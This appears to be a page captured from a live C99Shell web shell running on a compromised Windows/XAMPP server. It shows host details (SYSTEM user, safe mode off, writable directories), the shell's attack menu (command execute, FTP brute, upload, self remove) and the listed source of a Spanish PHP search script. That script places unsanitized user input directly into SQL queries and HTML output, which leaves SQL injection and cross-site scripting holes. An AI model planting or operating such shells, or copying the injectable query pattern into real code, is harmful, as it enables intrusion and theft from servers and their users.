!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\portel_dama\administracion\clases_herramientas\   drwxrwxrwx
Free 7.26 GB of 239.26 GB (3.03%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Copia de buscador.php (4.81 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<table width="100%" border="0" cellspacing="0" cellpadding="8" class="texto">
  <tr> 
    <td width="50%"><p>Buscando por: <strong><?php echo $buscar?></strong></p></td>
    <td width="50%" align="right">&nbsp;</td>
  </tr>
  <tr> 
    <td colspan="2"> 
      <?php 
     
if (isset($accion)) {
        
        
$cuando "";
        
$donde " contenido_links, contenido_links_tipo ";
        if (
$buscar_tipo != 0) {
            
$cuando " contenido_links.links_tipo_id = $buscar_tipo and";
        }
        
//if ($buscar_categoria != 0) {
            
$cuando $cuando "( contenido_pertenencia_categoria_links.links_id = contenido_links.links_id and contenido_pertenencia_categoria_links.categoria_tema_id = administracion_pertenencia_categoria_contacto.categoria_tema_id and administracion_pertenencia_categoria_contacto.contacto_id = $uid->usr_ce ) and ";
            
$donde $donde ", contenido_pertenencia_categoria_links, administracion_pertenencia_categoria_contacto ";
        
//}
        
if ($buscar != "") {
            
$cuando $cuando " ( contenido_links.links_nombre like '%$buscar%' or contenido_links.links_descripcion like '%$buscar%' or contenido_links.links_texto like '%$buscar%' ) and ( contenido_links.links_tipo_id = contenido_links_tipo.links_tipo_id )
            order by contenido_links.links_nombre"
;
        }
        
        if (isset(
$inicio_1)) {
            
        }else{
            
$inicio_1 0;
        }
        
        
            
// 1.Búsqueda sobre contenido
            
echo "<table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"4\" class=\"texto\"><tr><td bgcolor=\"#DDDDDD\"><b>1. CONTENIDOS</b></td><tr></table>";
            
$vinculo_pg "1--buscador.php" "?buscar=" $buscar "&x_y=" $x_y "&user=" $user "&accion=bus_&";    
            
$control = new select_pg(1"contenido_links.links_nombre, contenido_links.links_descripcion, contenido_links.links_id, contenido_links_tipo.links_tipo_nombre"$donde$cuando45"(nombre)-(descripcion)-(id)-(tipo)""<p><table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" class=\"texto\"><tr><td height=\"2\"></td></tr></table><br><a href=\"contenido_links_administracion.php?x_y=$x_y&user=$user&id_app=21&accion=-1&links_id=(id)\"><img src=\"../imagenes/pin.gif\" width=\"6\" height=\"6\" border=\"0\"> (nombre).</a> <i>(tipo)</i><br>(descripcion)</p>"$vinculo_pg ,$inicio_1); 
            
            
// 2. Búsqueda sobre categorias
            
echo "<table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"4\" class=\"texto\"><tr><td bgcolor=\"#DDDDDD\"><b>2. CATEGORIAS</b></td><tr></table>";
            
$cuando " ( contenido_categoria.categoria_tema_desc like '%$buscar%') and ( contenido_categoria.categoria_estado = 0 ) and ( administracion_pertenencia_categoria_contacto.categoria_tema_id = contenido_categoria.categoria_tema_id and administracion_pertenencia_categoria_contacto.contacto_id = $uid->usr_ce) order by contenido_categoria.categoria_tema_desc";
            
$donde " contenido_categoria, administracion_pertenencia_categoria_contacto ";
            
$vinculo_pg "1--buscador.php" "?buscar=" $buscar "&x_y=" $x_y "&user=" $user "&accion=bus_&";    
            
$control = new select_pg(1"contenido_categoria.categoria_id, contenido_categoria.categoria_tema_id, contenido_categoria.categoria_tema_desc, contenido_categoria.categoria_tema_id"$donde$cuando410"(id)-(descripcion)-(nombre)-(t_id)""<table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" class=\"texto\"><tr><td height=\"2\"></td></tr></table><br><a href=\"contenido_categoria_administracion.php?x_y=$x_y&user=$user&id_app=18&accion=-1&categoria_id=(id)\"><img src=\"../imagenes/pin.gif\" width=\"6\" height=\"6\" border=\"0\"> (nombre).</a> I <a href=\"contenido_links_administracion.php?id_app=21&accion=9&categoria_id=(t_id)&x_y=$x_y&user=$user\"> Visualizar.</a><BR>"$vinculo_pg ,$inicio_1); 
            
            
// 3. Búsqueda sobre archivos y medios
            
echo "<table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"4\" class=\"texto\"><tr><td bgcolor=\"#DDDDDD\"><b>3. ARCHIVOS</b></td><tr></table>";
            
$cuando " ( foto_nombre like '%$buscar%' or foto_descripcion like '%$buscar%' or foto_pie like '%$buscar%') order by foto_nombre";
            
$donde " contenido_foto_y_medios ";
            
$vinculo_pg "1--buscador.php" "?buscar=" $buscar "&x_y=" $x_y "&user=" $user "&accion=bus_&";    
            
$control = new select_pg(1"foto_id, foto_nombre, foto_formato, foto_archivo"$donde$cuando410"(id)-(nombre)-(formato)-(archivo)""<table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" class=\"texto\"><tr><td height=\"2\"></td></tr></table><br>[(formato)] <a href=\"contenido_foto_y_medios_administracion.php?x_y=$x_y&user=$user&id_app=19&accion=-1&foto_id=(id)\"><img src=\"../imagenes/pin.gif\" width=\"6\" height=\"6\" border=\"0\"> (nombre).</a><BR>"$vinculo_pg ,$inicio_1); 
    }    
        
?>
    </td>
  </tr>
  <tr bgcolor="#eeeeee"> 
    <td colspan="2"> <p> Resultados Encontrados</p></td>
  </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--